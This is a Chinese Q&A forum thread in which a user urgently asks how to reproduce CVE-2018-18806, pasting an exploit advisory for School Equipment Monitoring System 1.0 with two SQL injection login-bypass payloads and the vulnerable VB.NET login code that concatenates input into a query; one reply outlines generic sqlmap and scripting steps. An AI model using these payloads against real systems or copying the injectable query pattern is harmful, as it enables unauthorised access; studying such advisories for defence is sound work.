正在数羊... 2018-12-28 13:43 采纳率: 0%
浏览 1289

求大神复现cve-2018-18806这个漏洞的全过程,加急!!!

#Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection

Dork: N/A

Date: 2018-10-29

Exploit Author: Ihsan Sencan

Vendor Homepage: https://www.sourcecodester.com/users/janobe

Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip

Version: 1.0

Category: Windows

Tested on: WiN7_x64/KaLiLinuX_x64

CVE: CVE-2018-18806

POC:

1)

User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
Pass: Null

POC:

2)

User: 'or 1=1 or ''='

Pass: Null

https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png

#[PATH]/include/user.vb / 28 / '" & username & "'
#....
#24 Public Sub login(ByVal username As Object, ByVal pass As Object)
#25 Try
#26
#27 con.Open()
#28 reloadtxt("SELECT * FROM tbluseraccounts WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")
#29
#30
#31 If dt.Rows.Count > 0 Then
#32
#33 If dt.Rows(0).Item("Role") = "Administrator" Then
#34 MsgBox("Welcome " & dt.Rows(0).Item("Role"))
#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36 Form1.LogoutToolStripMenuItem.Text = "Logout"
#37 visibleMenu("true", "admin")
#38 LoginForm1.Close()
#39 Else
#40 visibleMenu("true", "not admin")
#41 Form1.LogoutToolStripMenuItem.Text = "Logout"
#42 LoginForm1.Close()
#43 End If
#44
#45 Else
#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)
#47 End If
#48 Catch ex As Exception
#49 MsgBox(ex.Message)
#50 End Try
#51 con.Close()
#52 da.Dispose()
#53 End Sub
#....

  • 写回答

1条回答 默认 最新

  • lshen01 2023-03-15 18:27
    关注

    参考GPT和自己的思路:

    对于这个漏洞的复现过程,首先需要下载并安装相应版本的 School Equipment Monitoring System,然后使用 SQLMap 或手工构造 SQL 注入 payload 进行漏洞验证。您可以参考以下步骤:

    1. 下载安装 School Equipment Monitoring System 1.0 版本;
    2. 然后使用工具 SQLMap 或手动构造 SQL 注入测试用例,测试 SQL 注入漏洞;
    3. 如果漏洞验证成功,在漏洞利用方面,您可以编写 Python 或其他语言的脚本,构造适当的 SQL 注入 payload,实现攻击目标系统。

    需要注意的是,为了避免对系统造成不必要的影响,请在事先充分测试和备份目标系统之后再进行漏洞利用。同时,漏洞利用行为可能会违反法律规定,因此请确保遵守当地法律法规。

    评论

报告相同问题?

悬赏问题

  • ¥15 微信小程序协议怎么写
  • ¥15 c语言怎么用printf(“\b \b”)与getch()实现黑框里写入与删除?
  • ¥20 怎么用dlib库的算法识别小麦病虫害
  • ¥15 华为ensp模拟器中S5700交换机在配置过程中老是反复重启
  • ¥15 java写代码遇到问题,求帮助
  • ¥15 uniapp uview http 如何实现统一的请求异常信息提示?
  • ¥15 有了解d3和topogram.js库的吗?有偿请教
  • ¥100 任意维数的K均值聚类
  • ¥15 stamps做sbas-insar,时序沉降图怎么画
  • ¥15 买了个传感器,根据商家发的代码和步骤使用但是代码报错了不会改,有没有人可以看看